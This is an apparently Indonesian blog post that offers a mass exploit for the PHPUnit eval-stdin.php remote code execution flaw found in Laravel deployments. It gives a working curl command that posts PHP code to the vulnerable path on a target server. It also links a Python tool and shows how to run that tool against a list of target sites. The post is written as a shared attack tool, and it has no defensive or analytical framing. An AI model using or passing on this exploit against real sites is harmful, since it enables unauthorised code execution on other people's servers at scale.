Header Ads Widget

Responsive Advertisement

Ticker

6/recent/ticker-posts

Mass Exploit Laravel PHP Unit RCE


Laravel phpunit RCE sebenarnya sudah banyak web dan blog-blog yang sudah publish ini bug, tapi secara umum cuman penjelasan manual untuk mengexploitasi bug pada phpunitnya, karena saya ada mass exploitnya yaudah mau di share di blog.

Penjelasan sedikit mengenai bug pada laravel ini murni dari phpunit[ thirdparty ] bukan dari laravelnya.
command to exploit :

DATA HOSTED WITH ♥ BY PASTEBIN.COM - DOWNLOAD RAW - SEE ORIGINAL
  1. curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

INFO TOOLS :
  • Download : CLICK DISINI
  • Use python program & mass exploit
  • command for run : python2 phpunit.py list.txt 

Posting Komentar

0 Komentar